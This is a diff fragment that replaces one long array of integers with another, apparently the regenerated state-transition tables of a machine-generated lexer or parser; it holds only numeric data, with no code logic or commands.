206, 217, 217, 217, 205, 218, 218, 218, 209, +- 1161, 230, 207, 1162, 208, 219, 219, 219, 1163, 220, +- 220, 220, 1164, 230, 1165, 210, 230, 761, 211, 1166, +- 215, 761, 212, 213, 216, 214, 255, 255, 255, 256, +- 256, 256, 1167, 761, 217, 257, 257, 257, 258, 258, +- 258, 1168, 219, 220, 259, 259, 259, 218, 260, 260, +- 260, 261, 261, 261, 262, 262, 262, 263, 263, 263, +- +- 264, 264, 264, 265, 265, 265, 1169, 256, 257, 266, +- 266, 266, 267, 267, 267, 
1173, 255, 1174, 259, 268, +- 268, 268, 258, 269, 269, 269, 270, 270, 270, 271, +- 271, 271, 1175, 260, 274, 274, 274, 263, 264, 1176, +- 1178, 265, 272, 272, 272, 273, 273, 273, 262, 1179, +- 267, 266, 276, 1180, 276, 276, 276, 277, 1181, 277, +- 277, 277, 278, 278, 278, 1183, 268, 271, 277, 279, +- 279, 279, 270, 280, 280, 280, 1185, 1186, 273, 1187, +- 272, 279, 1189, 1194, 274, 281, 281, 281, 282, 282, +- 282, 281, 1197, 280, 1198, 1199, 277, 283, 283, 283, +- +- 284, 284, 284, 285, 285, 285, 281, 281, 281, 281, +- 1200, 286, 286, 286, 287, 287, 287, 288, 288, 288, +- 289, 289, 289, 290, 290, 290, 291, 291, 291, 292, +- 292, 292, 293, 293, 293, 294, 294, 294, 295, 295, +- 295, 296, 296, 296, 297, 297, 297, 298, 298, 298, +- 284, 299, 299, 299, 285, 286, 1201, 1202, 289, 288, +- 300, 300, 300, 301, 301, 301, 1208, 290, 1209, 294, +- 1210, 1212, 295, 302, 302, 302, 347, 291, 1213, 296, +- 347, 1217, 293, 347, 1218, 299, 297, 1219, 1224, 299, +- 303, 303, 303, 300, 304, 304, 304, 1227, 298, 305, +- +- 305, 305, 306, 306, 306, 307, 307, 307, 308, 308, +- 308, 1229, 1242, 301, 1087, 302, 309, 309, 309, 310, +- 310, 310, 311, 311, 311, 1086, 303, 356, 356, 356, +- 357, 357, 357, 358, 358, 358, 1085, 1083, 304, 359, +- 359, 359, 307, 360, 360, 360, 1082, 1081, 308, 361, +- 361, 361, 1080, 305, 362, 362, 362, 363, 363, 363, +- 364, 364, 364, 1079, 1077, 356, 1076, 1075, 309, 1074, +- 1073, 311, 359, 365, 365, 365, 1072, 366, 366, 366, +- 1071, 1070, 358, 361, 367, 367, 367, 368, 368, 368, +- 1069, 369, 369, 369, 1068, 360, 370, 370, 370, 1067, +- +- 1066, 362, 371, 371, 371, 1065, 364, 1064, 1063, 363, +- 372, 372, 372, 373, 373, 373, 375, 375, 375, 1062, +- 376, 376, 376, 365, 366, 369, 378, 378, 378, 369, +- 377, 377, 377, 367, 1061, 375, 380, 380, 380, 371, +- 368, 379, 379, 379, 372, 376, 370, 1060, 1052, 377, +- 381, 381, 381, 1051, 372, 373, 378, 382, 382, 382, +- 1050, 379, 1049, 1048, 381, 380, 1045, 381, 383, 383, +- 383, 384, 384, 384, 381, 385, 385, 385, 
386, 386, +- 386, 387, 387, 387, 388, 388, 388, 389, 389, 389, +- 390, 390, 390, 391, 391, 391, 392, 392, 392, 1044, +- +- 393, 393, 393, 394, 394, 394, 395, 395, 395, 384, +- 1043, 385, 396, 396, 396, 397, 397, 397, 398, 398, +- 398, 399, 399, 399, 400, 400, 400, 401, 401, 401, +- 1042, 1041, 392, 677, 677, 389, 393, 402, 402, 402, +- 1039, 390, 677, 1038, 391, 403, 403, 403, 677, 396, +- 395, 404, 404, 404, 405, 405, 405, 399, 406, 406, +- 406, 401, 451, 451, 451, 1037, 397, 452, 452, 452, +- 453, 453, 453, 1036, 1035, 400, 1034, 454, 454, 454, +- 455, 455, 455, 403, 456, 456, 456, 1033, 405, 1032, +- 1031, 406, 457, 457, 457, 1030, 1029, 404, 458, 458, +- +- 458, 452, 1028, 459, 459, 459, 460, 460, 460, 461, +- 461, 461, 462, 462, 462, 463, 463, 463, 1027, 1026, +- 453, 454, 464, 464, 464, 1025, 457, 465, 465, 465, +- 1024, 455, 1023, 456, 466, 466, 466, 467, 467, 467, +- 468, 468, 468, 467, 469, 469, 469, 461, 458, 459, +- 471, 471, 471, 470, 470, 470, 462, 471, 1022, 1021, +- 470, 470, 470, 462, 468, 1012, 463, 1011, 1010, 465, +- 470, 464, 1009, 470, 469, 1007, 1006, 470, 470, 1005, +- 1004, 466, 472, 472, 472, 473, 473, 473, 474, 474, +- 474, 475, 475, 475, 476, 476, 476, 473, 477, 477, +- +- 477, 1003, 472, 1002, 1001, 475, 999, 998, 474, 478, +- 478, 478, 479, 479, 479, 480, 480, 480, 481, 481, +- 481, 482, 482, 482, 483, 483, 483, 484, 484, 484, +- 485, 485, 485, 486, 486, 486, 487, 487, 487, 997, +- 477, 996, 995, 478, 488, 488, 488, 489, 489, 489, +- 490, 490, 490, 480, 491, 491, 491, 994, 993, 479, +- 492, 492, 492, 495, 495, 539, 539, 539, 992, 481, +- 540, 540, 540, 991, 483, 541, 541, 541, 990, 495, +- 495, 542, 542, 542, 495, 989, 489, 988, 490, 987, +- 543, 543, 543, 986, 985, 488, 984, 983, 491, 544, +- +- 544, 544, 545, 545, 545, 982, 981, 539, 546, 546, +- 546, 492, 547, 547, 547, 548, 548, 548, 549, 549, +- 549, 980, 540, 550, 550, 550, 541, 543, 551, 551, +- 551, 552, 552, 552, 553, 553, 553, 979, 968, 544, +- 545, 967, 546, 966, 965, 547, 
554, 554, 554, 964, +- 963, 553, 549, 962, 555, 555, 555, 556, 556, 556, +- 557, 557, 557, 550, 961, 960, 557, 548, 558, 558, +- 558, 959, 958, 551, 559, 559, 559, 552, 555, 560, +- 560, 560, 558, 556, 957, 956, 560, 955, 559, 561, +- 561, 561, 562, 562, 562, 563, 563, 563, 564, 564, +- +- 564, 565, 565, 565, 954, 564, 561, 566, 566, 566, +- 563, 567, 567, 567, 568, 568, 568, 953, 562, 951, +- 565, 950, 562, 569, 569, 569, 570, 570, 570, 571, +- 571, 571, 566, 572, 572, 572, 573, 573, 573, 574, +- 574, 574, 567, 575, 575, 575, 576, 576, 576, 577, +- 577, 577, 578, 578, 578, 630, 630, 630, 949, 569, +- 631, 631, 631, 947, 946, 568, 632, 632, 632, 945, +- 944, 572, 634, 634, 634, 570, 943, 574, 633, 633, +- 633, 942, 941, 576, 635, 635, 635, 636, 636, 636, +- 637, 637, 637, 638, 638, 638, 639, 639, 639, 632, +- +- 640, 640, 640, 940, 939, 630, 938, 937, 631, 936, +- 634, 633, 641, 641, 641, 642, 642, 642, 935, 643, +- 643, 643, 635, 644, 644, 644, 645, 645, 645, 934, +- 933, 636, 918, 917, 637, 916, 915, 645, 914, 913, +- 644, 639, 638, 643, 646, 646, 646, 647, 647, 647, +- 912, 911, 640, 910, 641, 647, 648, 648, 648, 909, +- 907, 646, 649, 649, 649, 650, 650, 650, 651, 651, +- 651, 652, 652, 652, 653, 653, 653, 649, 906, 650, +- 648, 654, 654, 654, 653, 655, 655, 655, 902, 651, +- 901, 655, 652, 656, 656, 656, 654, 657, 657, 657, +- +- 658, 658, 658, 659, 659, 659, 900, 657, 660, 660, +- 660, 661, 661, 661, 662, 662, 662, 663, 663, 663, +- 714, 714, 714, 715, 715, 715, 656, 716, 716, 716, +- 717, 717, 717, 718, 718, 718, 719, 719, 719, 899, +- 898, 659, 720, 720, 720, 721, 721, 721, 661, 722, +- 722, 722, 897, 896, 716, 723, 723, 723, 714, 895, +- 894, 715, 893, 892, 717, 724, 724, 724, 725, 725, +- 725, 726, 726, 726, 727, 727, 727, 728, 728, 728, +- 729, 729, 729, 721, 730, 730, 730, 722, 728, 731, +- 731, 731, 891, 890, 727, 889, 888, 729, 732, 732, +- +- 732, 887, 886, 723, 733, 733, 733, 885, 732, 730, +- 724, 884, 733, 883, 731, 734, 734, 734, 882, 725, +- 
735, 735, 735, 736, 736, 736, 737, 737, 737, 881, +- 735, 736, 734, 738, 738, 738, 739, 739, 739, 740, +- 740, 740, 880, 879, 739, 739, 741, 741, 741, 857, +- 738, 742, 742, 742, 790, 790, 790, 855, 854, 737, +- 791, 791, 791, 792, 792, 792, 793, 793, 793, 794, +- 794, 794, 740, 795, 795, 795, 796, 796, 796, 797, +- 797, 797, 798, 798, 798, 853, 851, 790, 799, 799, +- 799, 800, 800, 800, 801, 801, 801, 802, 802, 802, +- +- 801, 800, 850, 794, 849, 792, 803, 803, 803, 791, +- 804, 804, 804, 799, 848, 793, 846, 797, 804, 845, +- 798, 805, 805, 805, 806, 806, 806, 807, 807, 807, +- 844, 805, 843, 842, 806, 808, 808, 808, 809, 809, +- 809, 810, 810, 810, 841, 840, 809, 809, 811, 811, +- 811, 812, 812, 812, 813, 813, 813, 858, 858, 858, +- 808, 859, 859, 859, 839, 812, 838, 837, 811, 860, +- 860, 860, 861, 861, 861, 836, 862, 862, 862, 813, +- 863, 863, 863, 864, 864, 864, 865, 865, 865, 835, +- 834, 866, 866, 866, 859, 867, 867, 867, 868, 868, +- +- 868, 833, 867, 832, 829, 858, 869, 869, 869, 870, +- 870, 870, 861, 862, 866, 871, 871, 871, 860, 828, +- 864, 827, 826, 868, 824, 823, 863, 872, 872, 872, +- 873, 873, 873, 874, 874, 874, 875, 875, 875, 876, +- 876, 876, 822, 821, 873, 820, 819, 872, 919, 919, +- 919, 818, 874, 920, 920, 920, 921, 921, 921, 817, +- 875, 922, 922, 922, 923, 923, 923, 924, 924, 924, +- 925, 925, 925, 926, 926, 926, 927, 927, 927, 928, +- 928, 928, 929, 929, 929, 930, 930, 930, 931, 931, +- 931, 816, 815, 927, 814, 920, 932, 932, 932, 789, +- +- 788, 929, 787, 925, 919, 785, 923, 921, 784, 930, +- 969, 969, 969, 922, 970, 970, 970, 781, 924, 971, +- 971, 971, 972, 972, 972, 779, 973, 973, 973, 974, +- 974, 974, 975, 975, 975, 976, 976, 976, 977, 977, +- 977, 778, 777, 969, 776, 976, 978, 978, 978, 1013, +- 1013, 1013, 1014, 1014, 1014, 1015, 1015, 1015, 775, 774, +- 970, 773, 974, 1016, 1016, 1016, 975, 972, 1017, 1017, +- 1017, 971, 973, 1018, 1018, 1018, 1019, 1019, 1019, 1020, +- 1020, 1020, 1053, 1053, 1053, 772, 771, 1013, 770, 1015, +- 
1054, 1054, 1054, 769, 1014, 1055, 1055, 1055, 1056, 1056, +- +- 1056, 1016, 1057, 1057, 1057, 1059, 1059, 1059, 1017, 1058, +- 1058, 1058, 1089, 1089, 1089, 1090, 1090, 1090, 767, 1018, +- 1091, 1091, 1091, 766, 1019, 1092, 1092, 1092, 765, 764, +- 1091, 763, 1093, 1093, 1093, 762, 760, 1053, 759, 1055, +- 758, 1054, 757, 1058, 1056, 756, 755, 1059, 1089, 1094, +- 1094, 1094, 1122, 1122, 1122, 1123, 1123, 1123, 1124, 1124, +- 1124, 1125, 1125, 1125, 1147, 1147, 1147, 1148, 1148, 1148, +- 1149, 1149, 1149, 1150, 1150, 1150, 1092, 1093, 1170, 1170, +- 1170, 1171, 1171, 1171, 1172, 1172, 1172, 1191, 1191, 1191, +- 1122, 1190, 1190, 1190, 1205, 1205, 1205, 754, 753, 1125, +- +- 1206, 1206, 1206, 752, 1123, 1214, 1214, 1214, 1124, 1215, +- 1215, 1215, 1147, 1206, 751, 750, 1148, 1221, 1221, 1221, +- 1222, 1222, 1222, 1150, 1226, 1226, 1226, 749, 1171, 1170, +- 1228, 1228, 1228, 1190, 748, 747, 1191, 1230, 1230, 1230, +- 746, 1205, 745, 1215, 1232, 1232, 1232, 1233, 1233, 1233, +- 744, 1214, 743, 712, 711, 710, 709, 708, 707, 705, +- 704, 1226, 703, 702, 701, 700, 1222, 699, 698, 697, +- 696, 695, 694, 693, 1228, 1230, 692, 690, 689, 687, +- 685, 684, 683, 680, 679, 678, 674, 673, 671, 670, +- 669, 668, 667, 1232, 1235, 1235, 1235, 1235, 1236, 1236, +- +- 1236, 1236, 1237, 1237, 1237, 1237, 1238, 1238, 1238, 1238, +- 1239, 1239, 1240, 1240, 1241, 666, 1241, 1241, 665, 664, +- 629, 628, 627, 626, 625, 624, 623, 622, 621, 620, +- 619, 618, 617, 616, 614, 613, 612, 610, 609, 608, +- 607, 606, 605, 604, 602, 601, 600, 599, 598, 597, +- 596, 595, 594, 593, 592, 591, 590, 589, 588, 587, +- 586, 585, 584, 583, 582, 581, 580, 579, 538, 537, +- 536, 534, 533, 532, 531, 530, 529, 528, 527, 526, +- 525, 524, 523, 522, 521, 520, 519, 518, 517, 516, +- 515, 514, 513, 512, 511, 510, 509, 508, 507, 506, +- +- 505, 504, 503, 502, 501, 500, 499, 498, 497, 496, +- 494, 493, 450, 447, 446, 445, 444, 443, 442, 441, +- 440, 439, 438, 437, 436, 435, 434, 433, 432, 431, +- 430, 429, 428, 427, 
426, 425, 424, 423, 422, 421, +- 420, 419, 418, 417, 416, 415, 414, 413, 412, 411, +- 410, 409, 408, 407, 354, 353, 352, 351, 350, 349, +- 348, 346, 345, 344, 343, 342, 341, 340, 339, 338, +- 337, 336, 335, 334, 333, 332, 331, 330, 329, 328, +- 327, 326, 325, 324, 322, 321, 320, 318, 317, 316, +- 315, 314, 313, 275, 254, 253, 252, 251, 250, 249, +- +- 248, 246, 244, 243, 242, 241, 239, 237, 235, 234, +- 232, 231, 229, 228, 227, 225, 223, 222, 221, 176, +- 174, 173, 149, 148, 146, 145, 143, 142, 140, 138, +- 136, 130, 81, 77, 74, 71, 51, 48, 42, 22, +- 21, 11, 9, 3, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, ++ 18, 18, 18, 18, 82, 82, 24, 24, 24, 25, ++ 25, 25, 7, 26, 26, 26, 44, 15, 48, 135, ++ 44, 7, 48, 7, 7, 1112, 7, 7, 135, 7, ++ 7, 7, 24, 7, 7, 7, 7, 7, 7, 7, ++ 7, 20, 147, 20, 20, 1121, 26, 27, 27, 27, ++ 20, 20, 28, 28, 28, 77, 147, 20, 30, 30, ++ 30, 27, 29, 29, 29, 25, 20, 31, 31, 31, ++ 32, 32, 32, 33, 33, 33, 188, 188, 20, 20, ++ 34, 34, 34, 84, 20, 84, 35, 35, 35, 36, ++ 36, 36, 20, 1122, 77, 20, 37, 37, 37, 28, ++ ++ 38, 38, 38, 29, 32, 30, 29, 72, 87, 29, ++ 87, 72, 32, 31, 32, 39, 39, 39, 134, 33, ++ 35, 238, 31, 40, 40, 40, 1123, 34, 41, 41, ++ 41, 42, 42, 42, 54, 54, 54, 36, 238, 75, ++ 136, 38, 38, 75, 38, 37, 80, 134, 37, 136, ++ 80, 38, 458, 39, 181, 229, 39, 55, 55, 55, ++ 56, 56, 56, 181, 39, 458, 229, 42, 54, 40, ++ 41, 39, 58, 58, 58, 41, 45, 45, 45, 45, ++ 45, 45, 45, 45, 45, 130, 1124, 45, 45, 130, ++ 45, 45, 1125, 45, 45, 45, 45, 45, 57, 57, ++ ++ 57, 61, 61, 61, 56, 132, 55, 59, 59, 59, ++ 58, 1127, 60, 60, 60, 62, 62, 62, 138, 58, ++ 132, 63, 63, 63, 64, 64, 64, 65, 65, 65, ++ 875, 235, 57, 66, 66, 66, 132, 875, 61, 57, ++ 137, 59, 
57, 235, 137, 57, 235, 61, 138, 59, ++ 60, 59, 150, 62, 59, 63, 150, 245, 64, 67, ++ 67, 67, 245, 63, 68, 68, 68, 1128, 63, 69, ++ 69, 69, 85, 85, 85, 65, 65, 70, 70, 70, ++ 142, 183, 66, 183, 142, 66, 71, 71, 71, 66, ++ 91, 91, 176, 142, 91, 91, 176, 67, 96, 96, ++ ++ 96, 185, 68, 185, 457, 68, 68, 69, 68, 457, ++ 69, 69, 90, 90, 728, 68, 728, 179, 69, 90, ++ 90, 179, 546, 70, 71, 69, 546, 70, 71, 97, ++ 97, 97, 86, 71, 86, 86, 86, 1129, 140, 98, ++ 98, 98, 86, 86, 140, 140, 97, 90, 90, 99, ++ 99, 99, 1130, 100, 100, 100, 101, 101, 101, 102, ++ 102, 102, 103, 103, 103, 104, 104, 104, 844, 844, ++ 86, 86, 98, 99, 100, 105, 105, 105, 106, 106, ++ 106, 107, 107, 107, 108, 108, 108, 109, 109, 109, ++ 110, 110, 110, 102, 1131, 1134, 103, 111, 111, 111, ++ ++ 112, 112, 112, 101, 113, 113, 113, 114, 114, 114, ++ 1135, 104, 115, 115, 115, 116, 116, 116, 117, 117, ++ 117, 118, 118, 118, 119, 119, 119, 105, 108, 107, ++ 106, 1136, 1137, 109, 120, 120, 120, 110, 252, 121, ++ 121, 121, 122, 122, 122, 114, 112, 252, 111, 113, ++ 116, 123, 123, 123, 115, 624, 124, 124, 124, 115, ++ 624, 118, 125, 125, 125, 117, 231, 231, 120, 231, ++ 1138, 119, 126, 126, 126, 127, 127, 127, 118, 128, ++ 128, 128, 1139, 120, 121, 144, 326, 144, 690, 326, ++ 144, 122, 144, 154, 154, 154, 155, 155, 155, 156, ++ ++ 156, 156, 690, 123, 124, 157, 157, 157, 158, 158, ++ 158, 1141, 125, 159, 159, 159, 1142, 127, 1143, 1145, ++ 128, 126, 160, 160, 160, 161, 161, 161, 162, 162, ++ 162, 163, 163, 163, 164, 164, 164, 154, 165, 165, ++ 165, 1146, 1152, 156, 166, 166, 166, 158, 155, 157, ++ 167, 167, 167, 168, 168, 168, 169, 169, 169, 170, ++ 170, 170, 159, 171, 171, 171, 172, 172, 172, 1153, ++ 164, 1154, 1155, 160, 173, 173, 173, 163, 174, 174, ++ 174, 1156, 166, 165, 162, 1157, 168, 167, 175, 175, ++ 175, 182, 182, 354, 1158, 166, 1159, 354, 182, 182, ++ ++ 354, 169, 1160, 171, 184, 184, 1161, 184, 184, 184, ++ 170, 172, 1163, 189, 189, 1164, 174, 187, 187, 1161, ++ 171, 189, 173, 1166, 187, 187, 182, 
182, 191, 191, ++ 191, 192, 192, 192, 193, 193, 193, 175, 194, 194, ++ 194, 195, 195, 195, 1168, 191, 1169, 1170, 193, 189, ++ 1171, 193, 187, 187, 196, 196, 196, 197, 197, 197, ++ 198, 198, 198, 199, 199, 199, 200, 200, 200, 1172, ++ 1177, 194, 201, 201, 201, 202, 202, 202, 203, 203, ++ 203, 192, 205, 205, 205, 195, 204, 204, 204, 206, ++ 206, 206, 207, 207, 207, 208, 208, 208, 199, 209, ++ ++ 209, 209, 1178, 196, 210, 210, 210, 197, 1180, 1181, ++ 198, 200, 203, 211, 211, 211, 201, 212, 212, 212, ++ 204, 213, 213, 213, 1182, 202, 214, 214, 214, 206, ++ 207, 215, 215, 215, 216, 216, 216, 217, 217, 217, ++ 218, 218, 218, 1183, 208, 219, 219, 219, 220, 220, ++ 220, 1184, 209, 1186, 1187, 210, 1188, 211, 221, 221, ++ 221, 222, 222, 222, 214, 1189, 212, 213, 223, 223, ++ 223, 224, 224, 224, 1190, 225, 225, 225, 260, 260, ++ 260, 243, 215, 1191, 1192, 216, 220, 243, 218, 217, ++ 1193, 1194, 219, 1195, 1199, 243, 221, 261, 261, 261, ++ ++ 262, 262, 262, 222, 263, 263, 263, 1200, 224, 225, ++ 264, 264, 264, 265, 265, 265, 266, 266, 266, 223, ++ 267, 267, 267, 268, 268, 268, 1201, 1202, 260, 269, ++ 269, 269, 1204, 262, 1205, 261, 1206, 270, 270, 270, ++ 271, 271, 271, 1207, 264, 272, 272, 272, 263, 273, ++ 273, 273, 1209, 274, 274, 274, 1211, 1212, 265, 275, ++ 275, 275, 1213, 268, 276, 276, 276, 269, 277, 277, ++ 277, 278, 278, 278, 267, 270, 1215, 778, 279, 279, ++ 279, 778, 271, 272, 280, 280, 280, 282, 1220, 282, ++ 282, 282, 283, 778, 283, 283, 283, 1223, 1224, 273, ++ ++ 274, 1225, 1226, 283, 1227, 1228, 277, 1234, 1235, 278, ++ 276, 279, 284, 284, 284, 285, 285, 285, 286, 286, ++ 286, 287, 287, 287, 1236, 1238, 288, 288, 288, 1239, ++ 286, 283, 288, 1243, 280, 289, 289, 289, 290, 290, ++ 290, 287, 291, 291, 291, 1244, 1245, 288, 288, 288, ++ 288, 292, 292, 292, 293, 293, 293, 294, 294, 294, ++ 1250, 295, 295, 295, 1253, 285, 296, 296, 296, 297, ++ 297, 297, 298, 298, 298, 299, 299, 299, 300, 300, ++ 300, 301, 301, 301, 302, 302, 302, 303, 303, 303, ++ 1255, 1268, 
291, 304, 304, 304, 1111, 1110, 293, 305, ++ ++ 305, 305, 292, 295, 296, 306, 306, 306, 307, 307, ++ 307, 1109, 1107, 297, 1106, 301, 1105, 1104, 302, 308, ++ 308, 308, 1103, 298, 1101, 303, 1100, 1099, 300, 309, ++ 309, 309, 310, 310, 310, 304, 311, 311, 311, 306, ++ 1098, 307, 1097, 306, 312, 312, 312, 313, 313, 313, ++ 305, 314, 314, 314, 315, 315, 315, 316, 316, 316, ++ 317, 317, 317, 318, 318, 318, 1096, 1095, 310, 308, ++ 1094, 309, 363, 363, 363, 364, 364, 364, 692, 692, ++ 311, 365, 365, 365, 366, 366, 366, 692, 314, 367, ++ 367, 367, 1093, 692, 315, 368, 368, 368, 312, 369, ++ ++ 369, 369, 370, 370, 370, 371, 371, 371, 1092, 316, ++ 363, 1091, 318, 372, 372, 372, 1090, 366, 373, 373, ++ 373, 374, 374, 374, 375, 375, 375, 1089, 1088, 368, ++ 365, 376, 376, 376, 377, 377, 377, 378, 378, 378, ++ 1087, 367, 379, 379, 379, 1086, 369, 380, 380, 380, ++ 1085, 371, 1084, 1075, 370, 381, 381, 381, 383, 383, ++ 383, 1074, 1073, 372, 1072, 373, 1071, 1068, 377, 1067, ++ 374, 1066, 377, 1065, 375, 384, 384, 384, 1064, 379, ++ 1062, 380, 1061, 1060, 376, 1059, 1058, 378, 385, 385, ++ 385, 380, 1057, 1056, 384, 1055, 1054, 381, 1053, 1052, ++ ++ 383, 386, 386, 386, 387, 387, 387, 388, 388, 388, ++ 389, 389, 389, 385, 390, 390, 390, 391, 391, 391, ++ 386, 392, 392, 392, 393, 393, 393, 388, 390, 1051, ++ 1050, 390, 1049, 1048, 387, 394, 394, 394, 390, 389, ++ 395, 395, 395, 396, 396, 396, 397, 397, 397, 398, ++ 398, 398, 399, 399, 399, 400, 400, 400, 401, 401, ++ 401, 1047, 393, 402, 402, 402, 403, 403, 403, 1046, ++ 1045, 394, 404, 404, 404, 405, 405, 405, 406, 406, ++ 406, 407, 407, 407, 408, 408, 408, 409, 409, 409, ++ 410, 410, 410, 1044, 401, 1034, 1033, 398, 1032, 402, ++ ++ 411, 411, 411, 399, 1031, 1029, 400, 412, 412, 412, ++ 1028, 1027, 405, 413, 413, 413, 404, 414, 414, 414, ++ 408, 415, 415, 415, 410, 460, 460, 460, 1026, 406, ++ 461, 461, 461, 462, 462, 462, 1025, 1024, 409, 1023, ++ 463, 463, 463, 1021, 1020, 412, 464, 464, 464, 1019, ++ 1018, 414, 1017, 
1016, 415, 465, 465, 465, 1015, 413, ++ 466, 466, 466, 1014, 461, 467, 467, 467, 468, 468, ++ 468, 469, 469, 469, 470, 470, 470, 1013, 1012, 471, ++ 471, 471, 1011, 462, 463, 472, 472, 472, 473, 473, ++ 473, 474, 474, 474, 466, 1010, 1009, 464, 1008, 475, ++ ++ 475, 475, 1007, 1006, 465, 476, 476, 476, 477, 477, ++ 477, 479, 479, 479, 468, 467, 470, 471, 478, 478, ++ 478, 480, 480, 480, 478, 481, 481, 481, 1005, 472, ++ 1004, 1003, 481, 481, 481, 479, 472, 1002, 1001, 473, ++ 474, 475, 481, 989, 988, 481, 482, 482, 482, 481, ++ 481, 480, 476, 482, 483, 483, 483, 484, 484, 484, ++ 485, 485, 485, 987, 986, 477, 487, 487, 487, 484, ++ 486, 486, 486, 985, 483, 488, 488, 488, 984, 983, ++ 485, 489, 489, 489, 486, 490, 490, 490, 491, 491, ++ 491, 492, 492, 492, 493, 493, 493, 494, 494, 494, ++ ++ 495, 495, 495, 496, 496, 496, 497, 497, 497, 498, ++ 498, 498, 499, 499, 499, 489, 982, 488, 500, 500, ++ 500, 501, 501, 501, 506, 506, 491, 502, 502, 502, ++ 981, 980, 490, 503, 503, 503, 550, 550, 550, 979, ++ 506, 506, 492, 978, 977, 506, 976, 494, 551, 551, ++ 551, 552, 552, 552, 553, 553, 553, 500, 975, 501, ++ 554, 554, 554, 499, 555, 555, 555, 556, 556, 556, ++ 974, 502, 557, 557, 557, 558, 558, 558, 550, 559, ++ 559, 559, 972, 971, 503, 560, 560, 560, 561, 561, ++ 561, 562, 562, 562, 563, 563, 563, 554, 970, 968, ++ ++ 551, 967, 552, 966, 555, 556, 557, 564, 564, 564, ++ 965, 964, 559, 565, 565, 565, 566, 566, 566, 567, ++ 567, 567, 561, 568, 568, 568, 569, 569, 569, 963, ++ 962, 562, 558, 566, 570, 570, 570, 560, 961, 563, ++ 570, 571, 571, 571, 572, 572, 572, 568, 574, 574, ++ 574, 565, 569, 564, 960, 571, 959, 958, 572, 573, ++ 573, 573, 575, 575, 575, 574, 573, 576, 576, 576, ++ 577, 577, 577, 957, 578, 578, 578, 577, 579, 579, ++ 579, 956, 576, 580, 580, 580, 955, 954, 575, 581, ++ 581, 581, 575, 578, 582, 582, 582, 583, 583, 583, ++ ++ 584, 584, 584, 579, 585, 585, 585, 586, 586, 586, ++ 587, 587, 587, 938, 580, 588, 588, 588, 589, 589, ++ 589, 590, 590, 590, 591, 
591, 591, 643, 643, 643, ++ 582, 644, 644, 644, 645, 645, 645, 646, 646, 646, ++ 581, 937, 585, 647, 647, 647, 583, 936, 587, 648, ++ 648, 648, 649, 649, 649, 589, 650, 650, 650, 651, ++ 651, 651, 652, 652, 652, 935, 934, 645, 933, 932, ++ 646, 653, 653, 653, 654, 654, 654, 643, 931, 644, ++ 930, 647, 655, 655, 655, 929, 927, 648, 656, 656, ++ 656, 658, 658, 658, 650, 926, 649, 657, 657, 657, ++ ++ 659, 659, 659, 651, 661, 661, 661, 660, 660, 660, ++ 922, 652, 662, 662, 662, 658, 653, 659, 660, 921, ++ 662, 661, 920, 919, 655, 918, 654, 663, 663, 663, ++ 657, 664, 664, 664, 665, 665, 665, 666, 666, 666, ++ 667, 667, 667, 668, 668, 668, 664, 917, 665, 916, ++ 915, 663, 914, 668, 669, 669, 669, 913, 666, 912, ++ 911, 667, 670, 670, 670, 671, 671, 671, 670, 669, ++ 672, 672, 672, 673, 673, 673, 674, 674, 674, 910, ++ 672, 675, 675, 675, 676, 676, 676, 677, 677, 677, ++ 678, 678, 678, 729, 729, 729, 909, 908, 671, 730, ++ ++ 730, 730, 731, 731, 731, 732, 732, 732, 733, 733, ++ 733, 734, 734, 734, 674, 735, 735, 735, 736, 736, ++ 736, 676, 737, 737, 737, 738, 738, 738, 907, 731, ++ 906, 729, 739, 739, 739, 905, 904, 730, 903, 732, ++ 740, 740, 740, 741, 741, 741, 742, 742, 742, 902, ++ 901, 736, 743, 743, 743, 744, 744, 744, 900, 899, ++ 737, 876, 874, 738, 873, 745, 745, 745, 872, 746, ++ 746, 746, 758, 758, 758, 744, 745, 747, 747, 747, ++ 739, 748, 748, 748, 870, 740, 746, 869, 749, 749, ++ 749, 750, 750, 750, 741, 868, 867, 742, 749, 750, ++ ++ 865, 864, 747, 751, 751, 751, 748, 752, 752, 752, ++ 753, 753, 753, 754, 754, 754, 863, 752, 753, 862, ++ 751, 755, 755, 755, 756, 756, 756, 757, 757, 757, ++ 861, 860, 756, 756, 759, 759, 759, 859, 755, 807, ++ 807, 807, 808, 808, 808, 858, 754, 809, 809, 809, ++ 810, 810, 810, 811, 811, 811, 812, 812, 812, 857, ++ 757, 813, 813, 813, 814, 814, 814, 815, 815, 815, ++ 856, 855, 807, 816, 816, 816, 817, 817, 817, 854, ++ 853, 818, 818, 818, 819, 819, 819, 852, 851, 809, ++ 812, 808, 848, 847, 819, 820, 820, 820, 846, 810, ++ 
++ 845, 820, 843, 842, 811, 815, 818, 821, 821, 821, ++ 841, 816, 822, 822, 822, 823, 823, 823, 824, 824, ++ 824, 840, 839, 823, 825, 825, 825, 838, 824, 826, ++ 826, 826, 837, 836, 825, 827, 827, 827, 828, 828, ++ 828, 829, 829, 829, 835, 834, 828, 828, 830, 830, ++ 830, 831, 831, 831, 832, 832, 832, 877, 877, 877, ++ 827, 878, 878, 878, 833, 831, 806, 805, 830, 879, ++ 879, 879, 880, 880, 880, 881, 881, 881, 804, 832, ++ 882, 882, 882, 883, 883, 883, 884, 884, 884, 885, ++ 885, 885, 802, 801, 878, 798, 886, 886, 886, 887, ++ ++ 887, 887, 888, 888, 888, 877, 887, 796, 881, 889, ++ 889, 889, 880, 890, 890, 890, 795, 882, 879, 886, ++ 891, 891, 891, 884, 892, 892, 892, 888, 794, 883, ++ 793, 893, 893, 893, 894, 894, 894, 895, 895, 895, ++ 896, 896, 896, 792, 892, 893, 939, 939, 939, 940, ++ 940, 940, 791, 894, 941, 941, 941, 942, 942, 942, ++ 790, 895, 943, 943, 943, 944, 944, 944, 945, 945, ++ 945, 946, 946, 946, 947, 947, 947, 948, 948, 948, ++ 949, 949, 949, 789, 950, 950, 950, 951, 951, 951, ++ 788, 940, 787, 786, 948, 952, 952, 952, 943, 953, ++ ++ 953, 953, 939, 950, 946, 941, 784, 944, 783, 942, ++ 782, 951, 990, 990, 990, 991, 991, 991, 781, 945, ++ 992, 992, 992, 993, 993, 993, 994, 994, 994, 995, ++ 995, 995, 996, 996, 996, 997, 997, 997, 998, 998, ++ 